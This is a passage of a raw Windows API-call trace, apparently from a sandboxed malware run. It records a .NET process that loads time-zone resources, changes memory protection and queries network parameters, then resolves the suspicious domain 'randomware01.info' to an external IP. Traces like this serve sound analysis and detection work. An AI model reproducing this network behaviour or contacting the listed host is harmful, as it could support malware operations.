(lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5b0001 [0098.226] GetLastError () returned 0x0 [0098.226] CoTaskMemAlloc (cb=0x3ec) returned 0x74d890 [0098.226] LoadStringW (in: hInstance=0x5b0001, uID=0x2a0, lpBuffer=0x74d890, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0098.226] CoTaskMemFree (pv=0x74d890) [0098.226] FreeLibrary (hLibModule=0x5b0001) returned 1 [0098.227] CoTaskMemAlloc (cb=0x20c) returned 0x74b678 [0098.227] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74b678 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0098.227] CoTaskMemFree (pv=0x74b678) [0098.227] CoTaskMemAlloc (cb=0x20c) returned 0x74b678 [0098.227] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x41e8c4, pwszFileMUIPath=0x74b678, pcchFileMUIPath=0x41e8c8, pululEnumerator=0x41e8bc | out: pwszLanguage=0x0, pcchLanguage=0x41e8c4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x41e8c8, pululEnumerator=0x41e8bc) returned 1 [0098.228] CoTaskMemFree (pv=0x0) [0098.228] CoTaskMemFree (pv=0x74b678) [0098.228] SysReAllocStringLen (in: pbstr=0x41e7e4*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x41e7e4*="tzres.dll.mui") returned 1 [0098.228] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0098.229] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5b0001 [0098.229] GetLastError () returned 0x0 [0098.230] CoTaskMemAlloc (cb=0x3ec) returned 0x74d890 [0098.230] LoadStringW (in: hInstance=0x5b0001, uID=0x29f, lpBuffer=0x74d890, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0098.230] CoTaskMemFree (pv=0x74d890) [0098.230] FreeLibrary (hLibModule=0x5b0001) returned 1 [0098.231] RegCloseKey (hKey=0x3b8) returned 0x0 [0098.231] SetEvent (hEvent=0x248) returned 1 [0098.254] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0098.256] SysReAllocStringLen (in: pbstr=0x41de0c*=0x0, psz="iphlpapi.dll", len=0xc | out: pbstr=0x41de0c*="iphlpapi.dll") returned 1 [0098.256] CharLowerBuffW (in: lpsz="iphlpapi.dll", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0098.256] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0098.256] GetLastError () returned 0x7e [0098.256] SetLastError (dwErrCode=0x7e) [0098.260] SysReAllocStringLen (in: pbstr=0x41de0c*=0x0, psz="iphlpapi.dll", len=0xc | out: pbstr=0x41de0c*="iphlpapi.dll") returned 1 [0098.260] CharLowerBuffW (in: lpsz="iphlpapi.dll", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0098.261] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x0) returned 0x74810000 [0098.261] GetLastError () returned 0x0 [0098.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ddf4*=0x748111bc, NumberOfBytesToProtect=0x41ddf8, NewAccessProtection=0x4, OldAccessProtection=0x41de2c | out: BaseAddress=0x41ddf4*=0x74811000, NumberOfBytesToProtect=0x41ddf8, OldAccessProtection=0x41de2c*=0x20) returned 0x0 [0098.262] GetCurrentProcess () returned 0xffffffff [0098.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ddf4*=0x748111bc, NumberOfBytesToProtect=0x41ddf8, NewAccessProtection=0x20, OldAccessProtection=0x41de2c | out: BaseAddress=0x41ddf4*=0x74811000, NumberOfBytesToProtect=0x41ddf8, OldAccessProtection=0x41de2c*=0x4) returned 0x0 [0098.262] GetCurrentProcess () returned 0xffffffff [0098.262] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ddf4*=0x748111c8, NumberOfBytesToProtect=0x41ddf8, NewAccessProtection=0x4, OldAccessProtection=0x41de2c | out: BaseAddress=0x41ddf4*=0x74811000, NumberOfBytesToProtect=0x41ddf8, OldAccessProtection=0x41de2c*=0x20) returned 0x0 [0098.263] GetCurrentProcess () returned 0xffffffff [0098.263] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ddf4*=0x748111c8, NumberOfBytesToProtect=0x41ddf8, NewAccessProtection=0x20, OldAccessProtection=0x41de2c | out: BaseAddress=0x41ddf4*=0x74811000, NumberOfBytesToProtect=0x41ddf8, OldAccessProtection=0x41de2c*=0x4) returned 0x0 [0098.263] GetProcAddress (hModule=0x74810000, lpProcName="GetNetworkParams") returned 0x74818918 [0098.263] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x41ead8 | out: pFixedInfo=0x0, pOutBufLen=0x41ead8) returned 0x6f [0098.566] GetCurrentThreadId () returned 0xba4 [0098.567] ResetEvent (hEvent=0xb8) returned 1 [0098.567] GetCurrentThreadId () returned 0xba4 [0098.567] GetCurrentThreadId () returned 0xba4 [0098.567] GetCurrentThreadId () returned 0xba4 [0098.567] GetCurrentThreadId () returned 0xba4 [0098.567] ResetEvent (hEvent=0xb8) returned 1 [0098.567] GetCurrentThreadId () returned 0xba4 [0098.567] GetCurrentThreadId () returned 0xba4 [0098.567] SetEvent (hEvent=0xbc) returned 1 [0098.567] SetEvent (hEvent=0xb8) returned 1 [0098.567] CloseHandle (hObject=0x3d0) returned 1 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] ResetEvent (hEvent=0xb8) returned 1 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] ResetEvent (hEvent=0xb8) returned 1 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] SetEvent (hEvent=0xbc) returned 1 [0098.568] SetEvent (hEvent=0xb8) returned 1 [0098.568] CloseHandle (hObject=0x3d0) returned 1 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] ResetEvent (hEvent=0xb8) returned 1 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] ResetEvent (hEvent=0xb8) returned 1 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] GetCurrentThreadId () returned 0xba4 [0098.568] SetEvent (hEvent=0xbc) returned 1 [0098.569] SetEvent (hEvent=0xb8) returned 1 [0098.569] CloseHandle (hObject=0x3d0) returned 1 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] ResetEvent (hEvent=0xb8) returned 1 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] ResetEvent (hEvent=0xb8) returned 1 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] SetEvent (hEvent=0xbc) returned 1 [0098.569] SetEvent (hEvent=0xb8) returned 1 [0098.569] CloseHandle (hObject=0x3d0) returned 1 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] ResetEvent (hEvent=0xb8) returned 1 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.569] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] ResetEvent (hEvent=0xb8) returned 1 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] SetEvent (hEvent=0xbc) returned 1 [0098.570] SetEvent (hEvent=0xb8) returned 1 [0098.570] CloseHandle (hObject=0x3d0) returned 1 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] ResetEvent (hEvent=0xb8) returned 1 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] ResetEvent (hEvent=0xb8) returned 1 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.570] SetEvent (hEvent=0xbc) returned 1 [0098.570] SetEvent (hEvent=0xb8) returned 1 [0098.570] CloseHandle (hObject=0x3d0) returned 1 [0098.570] GetCurrentThreadId () returned 0xba4 [0098.571] ResetEvent (hEvent=0xb8) returned 1 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] ResetEvent (hEvent=0xb8) returned 1 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] SetEvent (hEvent=0xbc) returned 1 [0098.571] SetEvent (hEvent=0xb8) returned 1 [0098.571] CloseHandle (hObject=0x3d0) returned 1 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] ResetEvent (hEvent=0xb8) returned 1 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] ResetEvent (hEvent=0xb8) returned 1 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] GetCurrentThreadId () returned 0xba4 [0098.571] SetEvent (hEvent=0xbc) returned 1 [0098.571] SetEvent (hEvent=0xb8) returned 1 [0098.571] CloseHandle (hObject=0x3d0) returned 1 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] ResetEvent (hEvent=0xb8) returned 1 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] ResetEvent (hEvent=0xb8) returned 1 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] SetEvent (hEvent=0xbc) returned 1 [0098.572] SetEvent (hEvent=0xb8) returned 1 [0098.572] CloseHandle (hObject=0x3d0) returned 1 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] ResetEvent (hEvent=0xb8) returned 1 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] ResetEvent (hEvent=0xb8) returned 1 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] GetCurrentThreadId () returned 0xba4 [0098.572] SetEvent (hEvent=0xbc) returned 1 [0098.573] SetEvent (hEvent=0xb8) returned 1 [0098.573] CloseHandle (hObject=0x3d0) returned 1 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] ResetEvent (hEvent=0xb8) returned 1 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] ResetEvent (hEvent=0xb8) returned 1 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] GetCurrentThreadId () returned 0xba4 [0098.573] SetEvent (hEvent=0xbc) returned 1 [0098.573] SetEvent (hEvent=0xb8) returned 1 [0098.573] CloseHandle (hObject=0x3d0) returned 1 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] ResetEvent (hEvent=0xb8) returned 1 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] ResetEvent (hEvent=0xb8) returned 1 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] SetEvent (hEvent=0xbc) returned 1 [0098.574] SetEvent (hEvent=0xb8) returned 1 [0098.574] CloseHandle (hObject=0x3d0) returned 1 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] ResetEvent (hEvent=0xb8) returned 1 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] ResetEvent (hEvent=0xb8) returned 1 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] GetCurrentThreadId () returned 0xba4 [0098.574] SetEvent (hEvent=0xbc) returned 1 [0098.574] SetEvent (hEvent=0xb8) returned 1 [0098.575] CloseHandle (hObject=0x3d0) returned 1 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] ResetEvent (hEvent=0xb8) returned 1 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] ResetEvent (hEvent=0xb8) returned 1 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] SetEvent (hEvent=0xbc) returned 1 [0098.575] SetEvent (hEvent=0xb8) returned 1 [0098.575] CloseHandle (hObject=0x3d0) returned 1 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] ResetEvent (hEvent=0xb8) returned 1 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] ResetEvent (hEvent=0xb8) returned 1 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.575] GetCurrentThreadId () returned 0xba4 [0098.576] SetEvent (hEvent=0xbc) returned 1 [0098.576] SetEvent (hEvent=0xb8) returned 1 [0098.576] CloseHandle (hObject=0x3d0) returned 1 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] ResetEvent (hEvent=0xb8) returned 1 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] ResetEvent (hEvent=0xb8) returned 1 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] SetEvent (hEvent=0xbc) returned 1 [0098.576] SetEvent (hEvent=0xb8) returned 1 [0098.576] CloseHandle (hObject=0x3d0) returned 1 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] ResetEvent (hEvent=0xb8) returned 1 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.576] GetCurrentThreadId () returned 0xba4 [0098.577] ResetEvent (hEvent=0xb8) returned 1 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] SetEvent (hEvent=0xbc) returned 1 [0098.577] SetEvent (hEvent=0xb8) returned 1 [0098.577] CloseHandle (hObject=0x3d0) returned 1 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] ResetEvent (hEvent=0xb8) returned 1 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] ResetEvent (hEvent=0xb8) returned 1 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.577] SetEvent (hEvent=0xbc) returned 1 [0098.577] SetEvent (hEvent=0xb8) returned 1 [0098.577] CloseHandle (hObject=0x3d0) returned 1 [0098.577] GetCurrentThreadId () returned 0xba4 [0098.578] ResetEvent (hEvent=0xb8) returned 1 [0098.578] GetCurrentThreadId () returned 0xba4 [0098.578] GetCurrentThreadId () returned 0xba4 [0098.578] GetCurrentThreadId () returned 0xba4 [0098.578] GetCurrentThreadId () returned 0xba4 [0098.578] ResetEvent (hEvent=0xb8) returned 1 [0098.578] GetCurrentThreadId () returned 0xba4 [0098.578] GetCurrentThreadId () returned 0xba4 [0098.578] SetEvent (hEvent=0xbc) returned 1 [0098.578] SetEvent (hEvent=0xb8) returned 1 [0098.578] CloseHandle (hObject=0x3d0) returned 1 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] ResetEvent (hEvent=0xb8) returned 1 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] ResetEvent (hEvent=0xb8) returned 1 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] GetCurrentThreadId () returned 0xba4 [0098.580] SetEvent (hEvent=0xbc) returned 1 [0098.580] SetEvent (hEvent=0xb8) returned 1 [0098.580] CloseHandle (hObject=0x3d4) returned 1 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] ResetEvent (hEvent=0xb8) returned 1 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] ResetEvent (hEvent=0xb8) returned 1 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] SetEvent (hEvent=0xbc) returned 1 [0098.583] SetEvent (hEvent=0xb8) returned 1 [0098.583] CloseHandle (hObject=0x3d4) returned 1 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] ResetEvent (hEvent=0xb8) returned 1 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] ResetEvent (hEvent=0xb8) returned 1 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] GetCurrentThreadId () returned 0xba4 [0098.583] SetEvent (hEvent=0xbc) returned 1 [0098.584] SetEvent (hEvent=0xb8) returned 1 [0098.584] CloseHandle (hObject=0x3d4) returned 1 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] ResetEvent (hEvent=0xb8) returned 1 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] ResetEvent (hEvent=0xb8) returned 1 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] SetEvent (hEvent=0xbc) returned 1 [0098.584] SetEvent (hEvent=0xb8) returned 1 [0098.584] CloseHandle (hObject=0x3d4) returned 1 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] ResetEvent (hEvent=0xb8) returned 1 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.584] GetCurrentThreadId () returned 0xba4 [0098.585] ResetEvent (hEvent=0xb8) returned 1 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] SetEvent (hEvent=0xbc) returned 1 [0098.585] SetEvent (hEvent=0xb8) returned 1 [0098.585] CloseHandle (hObject=0x3d4) returned 1 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] ResetEvent (hEvent=0xb8) returned 1 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] ResetEvent (hEvent=0xb8) returned 1 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.585] SetEvent (hEvent=0xbc) returned 1 [0098.585] SetEvent (hEvent=0xb8) returned 1 [0098.585] CloseHandle (hObject=0x3d4) returned 1 [0098.585] GetCurrentThreadId () returned 0xba4 [0098.586] ResetEvent (hEvent=0xb8) returned 1 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] ResetEvent (hEvent=0xb8) returned 1 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] SetEvent (hEvent=0xbc) returned 1 [0098.586] SetEvent (hEvent=0xb8) returned 1 [0098.586] CloseHandle (hObject=0x3d4) returned 1 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] ResetEvent (hEvent=0xb8) returned 1 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.586] ResetEvent (hEvent=0xb8) returned 1 [0098.586] GetCurrentThreadId () returned 0xba4 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] SetEvent (hEvent=0xbc) returned 1 [0098.587] SetEvent (hEvent=0xb8) returned 1 [0098.587] CloseHandle (hObject=0x3d4) returned 1 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] ResetEvent (hEvent=0xb8) returned 1 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] ResetEvent (hEvent=0xb8) returned 1 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.587] SetEvent (hEvent=0xbc) returned 1 [0098.587] SetEvent (hEvent=0xb8) returned 1 [0098.587] CloseHandle (hObject=0x3d4) returned 1 [0098.587] GetCurrentThreadId () returned 0xba4 [0098.588] ResetEvent (hEvent=0xb8) returned 1 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] ResetEvent (hEvent=0xb8) returned 1 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] SetEvent (hEvent=0xbc) returned 1 [0098.588] SetEvent (hEvent=0xb8) returned 1 [0098.588] CloseHandle (hObject=0x3d4) returned 1 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] ResetEvent (hEvent=0xb8) returned 1 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.588] GetCurrentThreadId () returned 0xba4 [0098.589] GetCurrentThreadId () returned 0xba4 [0098.589] ResetEvent (hEvent=0xb8) returned 1 [0098.589] GetCurrentThreadId () returned 0xba4 [0098.589] GetCurrentThreadId () returned 0xba4 [0098.589] SetEvent (hEvent=0xbc) returned 1 [0098.589] SetEvent (hEvent=0xb8) returned 1 [0098.589] CloseHandle (hObject=0x3d4) returned 1 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] ResetEvent (hEvent=0xb8) returned 1 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] ResetEvent (hEvent=0xb8) returned 1 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] GetCurrentThreadId () returned 0xba4 [0098.590] SetEvent (hEvent=0xbc) returned 1 [0098.590] SetEvent (hEvent=0xb8) returned 1 [0098.590] CloseHandle (hObject=0x3d0) returned 1 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] ResetEvent (hEvent=0xb8) returned 1 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] ResetEvent (hEvent=0xb8) returned 1 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] SetEvent (hEvent=0xbc) returned 1 [0098.592] SetEvent (hEvent=0xb8) returned 1 [0098.592] CloseHandle (hObject=0x3d0) returned 1 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.592] ResetEvent (hEvent=0xb8) returned 1 [0098.592] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] ResetEvent (hEvent=0xb8) returned 1 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] SetEvent (hEvent=0xbc) returned 1 [0098.593] SetEvent (hEvent=0xb8) returned 1 [0098.593] CloseHandle (hObject=0x3d0) returned 1 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] ResetEvent (hEvent=0xb8) returned 1 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] ResetEvent (hEvent=0xb8) returned 1 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] GetCurrentThreadId () returned 0xba4 [0098.593] SetEvent (hEvent=0xbc) returned 1 [0098.593] SetEvent (hEvent=0xb8) returned 1 [0098.593] CloseHandle (hObject=0x3d0) returned 1 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] ResetEvent (hEvent=0xb8) returned 1 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] ResetEvent (hEvent=0xb8) returned 1 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] SetEvent (hEvent=0xbc) returned 1 [0098.594] SetEvent (hEvent=0xb8) returned 1 [0098.594] CloseHandle (hObject=0x3d0) returned 1 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] ResetEvent (hEvent=0xb8) returned 1 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.594] GetCurrentThreadId () returned 0xba4 [0098.607] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0098.607] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x739b38 [0098.607] GetNetworkParams (in: pFixedInfo=0x739b38, pOutBufLen=0x41ead8 | out: pFixedInfo=0x739b38, pOutBufLen=0x41ead8) returned 0x0 [0098.637] LocalFree (hMem=0x739b38) returned 0x0 [0098.639] CoTaskMemAlloc (cb=0x20c) returned 0x74b678 [0098.639] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x74b678, nSize=0x104 | out: lpBuffer="鬸s텸r") returned 0x0 [0098.639] CoTaskMemFree (pv=0x74b678) [0098.639] CoTaskMemAlloc (cb=0x20c) returned 0x74b678 [0098.639] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x74b678, nSize=0x104 | out: lpBuffer="鬸s텸r") returned 0x0 [0098.639] CoTaskMemFree (pv=0x74b678) [0098.644] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3cc [0098.650] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3c8 [0098.651] GetProcAddress (hModule=0x77230000, lpProcName="GetAddrInfoW") returned 0x77234889 [0098.652] GetProcAddress (hModule=0x77230000, lpProcName="freeaddrinfo") returned 0x77234b1b [0098.652] GetAddrInfoW (in: pNodeName="randomware01.info", pServiceName=0x0, pHints=0x41e9c8*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x41e970 | out: ppResult=0x41e970*=0x5b64958*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="randomware01.info", ai_addr=0x5b64980*(sa_family=2, sin_port=0x0, sin_addr="95.217.137.242"), ai_next=0x0)) returned 0 [0098.655] GetCurrentThreadId () returned 0xba4 [0098.655] ResetEvent (hEvent=0xb8) returned 1 [0098.655] GetCurrentThreadId () returned 0xba4 [0098.655] GetCurrentThreadId () returned 0xba4 [0098.655] GetCurrentThreadId () returned 0xba4 